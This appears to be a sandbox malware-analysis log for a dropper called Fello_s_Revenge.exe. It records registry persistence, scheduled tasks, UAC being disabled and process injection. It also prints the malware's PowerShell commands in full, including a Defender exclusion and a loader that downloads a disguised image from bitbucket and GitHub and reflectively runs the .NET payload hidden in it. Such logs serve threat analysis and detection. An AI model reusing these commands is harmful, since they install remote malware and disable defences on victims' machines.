\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Dhpemm32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Kkfmcc32.dll" Flfpabkp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Pbihfb32.dll" Hjlioj32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Iplfej32.dll" Hnjbeh32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Cfnoogbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ijppackl.dll" Cfnoogbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Bpjmnknl.dll" Epmfgo32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Epmfgo32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738} 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Hnjbeh32.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3224 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4616 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4364 schtasks.exe 3588 schtasks.exe 4752 schtasks.exe 5092 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1700 powershell.exe 2052 powershell.exe 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 328 vbc.exe 328 vbc.exe 2040 powershell.exe 3544 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe 3544 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe 3544 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe 3544 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 2040 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 328 vbc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2388 wrote to memory of 1700 2388 Fello_s_Revenge.exe 30 PID 2388 wrote to memory of 1700 2388 Fello_s_Revenge.exe 30 PID 2388 wrote to memory of 1700 2388 Fello_s_Revenge.exe 30 PID 2388 wrote to memory of 1700 2388 Fello_s_Revenge.exe 30 PID 2388 wrote to memory of 2052 2388 Fello_s_Revenge.exe 32 PID 2388 wrote to memory of 2052 2388 Fello_s_Revenge.exe 32 PID 2388 wrote to memory of 2052 2388 Fello_s_Revenge.exe 32 PID 2388 wrote to memory of 2052 2388 Fello_s_Revenge.exe 32 PID 2388 wrote to memory of 2708 2388 Fello_s_Revenge.exe 34 PID 2388 wrote to memory of 2708 2388 Fello_s_Revenge.exe 34 PID 2388 wrote to memory of 2708 2388 Fello_s_Revenge.exe 34 PID 2388 wrote to memory of 2708 2388 Fello_s_Revenge.exe 34 PID 2388 wrote to memory of 2808 2388 Fello_s_Revenge.exe 35 PID 2388 wrote to memory of 2808 2388 Fello_s_Revenge.exe 35 PID 2388 wrote to memory of 2808 2388 Fello_s_Revenge.exe 35 PID 2388 wrote to memory of 2808 2388 Fello_s_Revenge.exe 35 PID 2388 wrote to memory of 2732 2388 Fello_s_Revenge.exe 36 PID 2388 wrote to memory of 2732 2388 Fello_s_Revenge.exe 36 PID 2388 wrote to memory of 2732 2388 Fello_s_Revenge.exe 36 PID 2388 wrote to memory of 2732 2388 Fello_s_Revenge.exe 36 PID 2388 wrote to memory of 2636 2388 Fello_s_Revenge.exe 37 PID 2388 wrote to memory of 2636 2388 Fello_s_Revenge.exe 37 PID 2388 wrote to memory of 2636 2388 Fello_s_Revenge.exe 37 PID 2388 wrote to memory of 2636 2388 Fello_s_Revenge.exe 37 PID 2388 wrote to memory of 4500 2388 Fello_s_Revenge.exe 38 PID 2388 wrote to memory of 4500 2388 Fello_s_Revenge.exe 38 PID 2388 wrote to memory of 4500 2388 Fello_s_Revenge.exe 38 PID 2388 wrote to memory of 4500 2388 Fello_s_Revenge.exe 38 PID 2732 wrote to memory of 3264 2732 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 39 PID 2732 wrote to memory of 3264 2732 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 39 PID 2732 wrote to memory of 3264 2732 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 39 PID 2732 wrote to memory of 3264 2732 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 39 PID 2388 wrote to memory of 3256 2388 Fello_s_Revenge.exe 40 PID 2388 wrote to memory of 3256 2388 Fello_s_Revenge.exe 40 PID 2388 wrote to memory of 3256 2388 Fello_s_Revenge.exe 40 PID 2388 wrote to memory of 3256 2388 Fello_s_Revenge.exe 40 PID 2388 wrote to memory of 3256 2388 Fello_s_Revenge.exe 40 PID 2388 wrote to memory of 3256 2388 Fello_s_Revenge.exe 40 PID 2388 wrote to memory of 3256 2388 Fello_s_Revenge.exe 40 PID 2388 wrote to memory of 3392 2388 Fello_s_Revenge.exe 41 PID 2388 wrote to memory of 3392 2388 Fello_s_Revenge.exe 41 PID 2388 wrote to memory of 3392 2388 Fello_s_Revenge.exe 41 PID 2388 wrote to memory of 3392 2388 Fello_s_Revenge.exe 41 PID 2808 wrote to memory of 3416 2808 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 42 PID 2808 wrote to memory of 3416 2808 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 42 PID 2808 wrote to memory of 3416 2808 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 42 PID 2808 wrote to memory of 3416 2808 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 42 PID 2388 wrote to memory of 3456 2388 Fello_s_Revenge.exe 43 PID 2388 wrote to memory of 3456 2388 Fello_s_Revenge.exe 43 PID 2388 wrote to memory of 3456 2388 Fello_s_Revenge.exe 43 PID 2388 wrote to memory of 3456 2388 Fello_s_Revenge.exe 43 PID 2388 wrote to memory of 3544 2388 Fello_s_Revenge.exe 44 PID 2388 wrote to memory of 3544 2388 Fello_s_Revenge.exe 44 PID 2388 wrote to memory of 3544 2388 Fello_s_Revenge.exe 44 PID 2388 wrote to memory of 3544 2388 Fello_s_Revenge.exe 44 PID 2388 wrote to memory of 3664 2388 Fello_s_Revenge.exe 45 PID 2388 wrote to memory of 3664 2388 Fello_s_Revenge.exe 45 PID 2388 wrote to memory of 3664 2388 Fello_s_Revenge.exe 45 PID 2388 wrote to memory of 3664 2388 Fello_s_Revenge.exe 45 PID 3416 wrote to memory of 3740 3416 Morfey.EXE 47 PID 3416 wrote to memory of 3740 3416 Morfey.EXE 47 PID 3416 wrote to memory of 3740 3416 Morfey.EXE 47 PID 3264 wrote to memory of 3656 3264 Cfnoogbo.exe 46 PID 3264 wrote to memory of 3656 3264 Cfnoogbo.exe 46 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵PID:1100
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1164
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\Fello_s_Revenge.exe"C:\Users\Admin\AppData\Local\Temp\Fello_s_Revenge.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAaQB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAagBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEMATwBPAEsARQBEACAATwBOAEMARQAgAEEARwBBAEkATgAgAEIAWQAgAEYANdhs3DXYKd012CndbwAgAEwATQBBAE8AIQAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAHUAZgAjAD4A"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAcwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBxACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe"C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe"3⤵
- Executes dropped EXE
PID:2708
-
-
C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe"C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Roaming\Morfey.EXEC:\Users\Admin\AppData\Roaming\Morfey.EXE4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\system32\cmd.execmd.exe /c grw.vbs5⤵PID:3740
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\grw.vbs"6⤵PID:3896
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DY#MQBl#HM#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#Hc#cQB0#HI#ZQB0#HI#ZQ#v#Gs#cgB1#HI#ZQBt#Gw#dQBy#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxDutionpolicy bypass -Noprofile -command $OWjuxD"7⤵
- Command and Scripting Interpreter: PowerShell
PID:1396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.61es/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"8⤵
- Command and Scripting Interpreter: PowerShell
PID:3720
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe"C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe"3⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\Cfnoogbo.exeC:\Windows\system32\Cfnoogbo.exe4⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\SysWOW64\Cpiqmlfm.exeC:\Windows\system32\Cpiqmlfm.exe5⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3656 -
C:\Windows\SysWOW64\Dhpemm32.exeC:\Windows\system32\Dhpemm32.exe6⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3004 -
C:\Windows\SysWOW64\Epmfgo32.exeC:\Windows\system32\Epmfgo32.exe7⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1608 -
C:\Windows\SysWOW64\Flfpabkp.exeC:\Windows\system32\Flfpabkp.exe8⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:624 -
C:\Windows\SysWOW64\Gqdefddb.exeC:\Windows\system32\Gqdefddb.exe9⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3432 -
C:\Windows\SysWOW64\Hjlioj32.exeC:\Windows\system32\Hjlioj32.exe10⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2232 -
C:\Windows\SysWOW64\Hnjbeh32.exeC:\Windows\system32\Hnjbeh32.exe11⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4376 -
C:\Windows\SysWOW64\Hmdhad32.exeC:\Windows\system32\Hmdhad32.exe12⤵PID:4692
-
C:\Windows\SysWOW64\Ifjlcmmj.exeC:\Windows\system32\Ifjlcmmj.exe13⤵PID:4932
-
C:\Windows\SysWOW64\Jfofol32.exeC:\Windows\system32\Jfofol32.exe14⤵PID:1736
-
C:\Windows\SysWOW64\Jgabdlfb.exeC:\Windows\system32\Jgabdlfb.exe15⤵PID:316
-
C:\Windows\SysWOW64\Kgclio32.exeC:\Windows\system32\Kgclio32.exe16⤵PID:4840
-
C:\Windows\SysWOW64\Mjkgjl32.exeC:\Windows\system32\Mjkgjl32.exe17⤵PID:1748
